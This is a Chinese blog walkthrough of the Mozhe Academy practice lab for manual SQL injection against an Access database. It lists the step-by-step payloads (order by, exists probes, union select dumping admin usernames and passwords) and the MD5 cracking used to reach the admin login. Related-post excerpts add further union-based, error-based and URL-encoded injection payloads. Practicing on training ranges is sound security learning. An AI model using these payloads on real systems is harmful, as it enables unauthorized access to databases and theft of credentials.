墨者学院;sql手工注入;access;在线靶场

最新推荐文章于 2025-06-11 16:18:48 发布
最新推荐文章于 2025-06-11 16:18:48 发布
阅读量856 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: java servlet jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaochenhang/article/details/126437065
本文详细介绍了如何利用Access数据库的注入漏洞进行一系列操作,包括注册、获取端口号和地址、探测字段和表名、尝试admin表的存在、枚举字段以及爆破用户账户和密码。通过MD5解码,成功登录用户管理后台。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、注册账号,启动环境;购买墨币;

2、 得到端口号和地址;

 3、进入靶场;

 

4、输入' 成功闭合报错,有注入漏洞;

 

5、access数据库没有库名,都是表名;

order by 4

判断出四个字段

6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;

and exists(select count(*) from admin)

7、 查找回显字段

union select 1,2,3,4 from admin

8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;

id,username,passwd

and exists(select id from admin) 

 and exists(select username from admin)

 

and exists(select password from admin)

这里枚举失败,翻车;

 

and exists(select passwd from admin)

9、爆一下用户账户和密码;

union select 1,username,passwd,4 from admin 

md5 解码一下;

MD5编码是由数字与字母组成,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。

 

10、这里登陆一下

mozhe

27737201

 

 

 

okok

恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d

 

小乘杭
关注
SQL注入靶场
yesdmmf的博客
05-11 178
Less-01 Less-02 同第一题一样,只是在id传参出少了单引号 Less-03 闭合方式换成了‘)的形式 Less-04 更换闭合方式 Less-05 因为会显示数据库报错,可尝试报错注入 1、通过floor报错 and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from inform...
学院--SQL手工注入漏洞测试(Access数据库)
YYYYYcici的博客
05-18 957
学院SQL手工注入漏洞测试(Access数据库) 靶场连接: 解题思路: 判断是否存在sql注入 利用order by判断字段数量 联合注入猜测表名 联合注入猜测列名 登陆,拿KEY 打开题目,页面如下所示 一、 点击蓝色划线区域,跳转下一正常页面(跳转页面出现id=1) 二、判断存在注入(/ 、-0 、 and 1=1) 三、判断字段数量(order by...
学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1826
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
SQL注入sqli-labs靶场记录(四)
最新发布
2301_77457568的博客
06-11 1031
sqlmap:是一款开源的自动化SQL注入工具‌,主要用于检测和利用SQL注入漏洞,支持数据库指纹识别、数据提取及系统命令执行等功能。它是使用python编写的SQL注入神器,支持报错注入,布尔盲注,时间盲注等。布尔盲注:布尔型数据只有true和false两种结果,当语句执行正确时返回true,即显示正常,当语句错误时返回false,即显示异常。
学院SQL手工注入在线靶场SQLsever;
xiaochenhang的博客
08-21 1403
object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限。syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。
学院在线靶场SQL手工注入漏洞测试(MySQL数据库)
qq_47271638的博客
05-07 767
学院在线靶场SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。 此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。 然后查看哪个字段能显示出来 在URL后面联合查询 un
sql注入靶场
weixin_45095113的博客
11-27 726
SQL注入靶场
学院SQL手工注入漏洞测试(Access数据库)
weixin_43884770的博客
12-04 1223
背景介绍 安全工程师"者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行SQL注入测试,获取管理密码登录。 1、判断注入点: 分别用and...
SQL手工注入漏洞测试—Access数据库(学院靶场
ISNS的博客
07-09 1544
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
靶场 入门:SQL手工注入漏洞测试(Access数据库)
qq_43233085的博客
01-10 1310
入门:SQL手工注入漏洞测试(Access数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5...
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 798
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
sql注入靶场练习
weixin_46976845的博客
03-19 6165
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
靶场 SQL手工注入漏洞测试(Access数据库)
曹振国的博客
06-20 743
Access 注入关于Access:进入环境:1.寻找注入点2.查询字段数3.猜测它有admin表4.猜字段5.寻找输出点6.查询username,passwd字段md5解密,进入后台拿到key值 关于AccessAccess 是表的集合 Access 数据库的结构 => 表、字段 select xxx from 表 => 正常查询 想知道access的表名你只能去猜 常见的表: admin news job work admin_user user 进入环境: 1.寻找注入点 ?id=
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 4205
sqli靶场SqliLabs 是一个学习 SQL 注入靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
SQL注入靶场通关
热门推荐
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场通关 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 390
学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
SQL注入--靶场练习
wmr123456001的博客
02-11 2281
SQL注入靶场练习
学院-access数据库
Qianzshuo的博客
05-03 782
学院 SQL手工注入漏洞测试(Access数据库) 寻找注入点 猜字段数 猜表名 猜列名 查看回显位置 md5解密 登录得到key
靶场——SQL注入
newqian的博客
08-06 1962
接下来不多搞了,总结一下,get和post区别不大,都是看反馈选择对应的注入方式,不过一个主要靠地址栏,一个看from菜单输入,根据不同需求选择注入方式,联合查询就是一起查,全部一起显示,不过要注意长度限制,和表名列名获取等等。利用文件导入的方式进行注入,不过条件苛刻,首先要有root权限,接着需要知道网站路径,最后还需要一个为空,就真的是空的,不是null,由于条件过于苛刻,因此很少见(其原理就是利用其先上传再删除的机制,可以与程序抢进程,使其上传到上级目录,这样即使原目录的文件删除也没用)
学院sql手工注入
03-03
### 关于SQL手工注入的学习 #### SQL手工注入简介 SQL注入是一种常见的Web应用程序攻击方式,通过向查询参数输入恶意的SQL语句片段,从而改变原有SQL命令的行为。这种技术能够绕过身份验证机制、读取敏感数据甚至控制服务器。 #### 靶场环境介绍 学院提供了一个专门用于练习SQL注入技巧的安全测试平台[^2]。此靶场基于Nginx+PHP+MySQL架构构建而成,并且访问成本低廉——仅需消耗一枚虚拟货币“币”,新用户注册时通常会被赠送足够的余额来进行多次尝试而不必担心额外开销。 #### 实践案例分析 对于想要深入了解如何实施SQL注入的人来说,在实际操作之前先观察目标网站是否存在潜在可利用之处非常重要。比如查看URL中的GET请求参数是否未经充分过滤就被直接拼接到后台执行的SQL指令里;又或者是POST表单提交的数据项有没有被妥善处理等情形都可能是突破口所在[^1]。 当确认存在风险点之后,则可以根据具体场景采取不同策略展开进一步探索: - **字符型字段**:如果发现某个文本框允许接收任意字符串作为输入值的话,那么就可以试着构造一些特殊模式串去试探内部逻辑反应情况。例如`' OR '1'='1`这样的表达式往往能帮助判断出是否有漏洞存在以及其大致位置范围[^3]。 - **联合查询(UNION SELECT)**:这是一种较为高级但也非常实用的方法之一。它可以让攻击者将自己的SELECT子句附加到原始查询后面并获取更多有用的信息。像下面这条语句就是用来枚举当前库内所有表格名称及其所属数据库名的一个例子: ```sql new_list.php?id=-1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),DATABASE(),4 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() ``` 请注意上述做法仅供合法授权下的渗透测试培训用途,请勿非法入侵任何网络设施! #### 安全建议 为了防止遭受此类威胁影响业务正常运转,开发者应当遵循最佳编码实践指南,如采用预编译语句代替动态组装SQL文法结构;严格校验前端传来的一切外部可控变量合法性;定期审查源码质量排除隐患等等措施加强防护力度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值